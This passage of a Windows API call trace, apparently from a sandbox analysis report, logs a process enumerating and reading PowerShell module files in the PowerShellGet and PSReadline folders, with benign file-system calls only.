ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0178.176] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0178.176] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0178.176] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0178.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2d0) returned 1 [0178.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de290) returned 1 [0178.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de380) returned 1 [0178.177] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0178.177] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7dde10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0178.177] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b7de020 | out: lpFindFileData=0x1b7de020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0178.197] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0178.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0178.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0178.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0178.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0178.198] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.199] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0178.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2d0) returned 1 [0178.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de290) returned 1 [0178.199] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7ddf10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0178.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7ddf70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0178.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de3b0) returned 1 [0178.200] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x1b7de490 | out: lpFileInformation=0x1b7de490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0178.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de370) returned 1 [0178.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de3e0) returned 1 [0178.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dded0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0178.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0178.200] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b7de080 | out: lpFindFileData=0x1b7de080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0178.201] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.201] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0178.201] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0178.202] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0178.202] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0178.202] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0178.202] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0178.202] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0178.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de330) returned 1 [0178.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2f0) returned 1 [0178.203] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0178.204] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0178.204] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0178.204] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0178.204] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0178.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0178.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0178.205] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0178.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0178.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0178.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0178.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0178.205] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0178.205] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.206] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0178.206] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.206] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0178.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0178.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0178.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x1b7de170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0178.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5b0) returned 1 [0178.206] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7de690 | out: lpFileInformation=0x1b7de690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1 [0178.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de570) returned 1 [0178.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0178.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de350) returned 1 [0178.208] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x564 [0178.208] GetFileType (hFile=0x564) returned 0x1 [0178.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2c0) returned 1 [0178.208] GetFileType (hFile=0x564) returned 0x1 [0178.208] ReadFile (in: hFile=0x564, lpBuffer=0x21fe268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21fe268*, lpNumberOfBytesRead=0x1b7de428*=0x1000, lpOverlapped=0x0) returned 1 [0178.211] ReadFile (in: hFile=0x564, lpBuffer=0x21fe268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21fe268*, lpNumberOfBytesRead=0x1b7de428*=0x1000, lpOverlapped=0x0) returned 1 [0178.211] ReadFile (in: hFile=0x564, lpBuffer=0x21fe268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21fe268*, lpNumberOfBytesRead=0x1b7de428*=0x1000, lpOverlapped=0x0) returned 1 [0178.211] ReadFile (in: hFile=0x564, lpBuffer=0x21fe268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21fe268*, lpNumberOfBytesRead=0x1b7de428*=0x1000, lpOverlapped=0x0) returned 1 [0178.212] ReadFile (in: hFile=0x564, lpBuffer=0x21fe268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21fe268*, lpNumberOfBytesRead=0x1b7de428*=0x1000, lpOverlapped=0x0) returned 1 [0178.212] ReadFile (in: hFile=0x564, lpBuffer=0x21fe268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21fe268*, lpNumberOfBytesRead=0x1b7de428*=0xac4, lpOverlapped=0x0) returned 1 [0178.212] ReadFile (in: hFile=0x564, lpBuffer=0x21fd86c, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21fd86c*, lpNumberOfBytesRead=0x1b7de428*=0x0, lpOverlapped=0x0) returned 1 [0178.212] ReadFile (in: hFile=0x564, lpBuffer=0x21fe268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21fe268*, lpNumberOfBytesRead=0x1b7de428*=0x0, lpOverlapped=0x0) returned 1 [0178.212] CloseHandle (hObject=0x564) returned 1 [0178.214] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0178.214] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0178.214] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0178.214] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0178.214] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0178.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0178.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0178.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36 [0178.214] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0178.215] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: 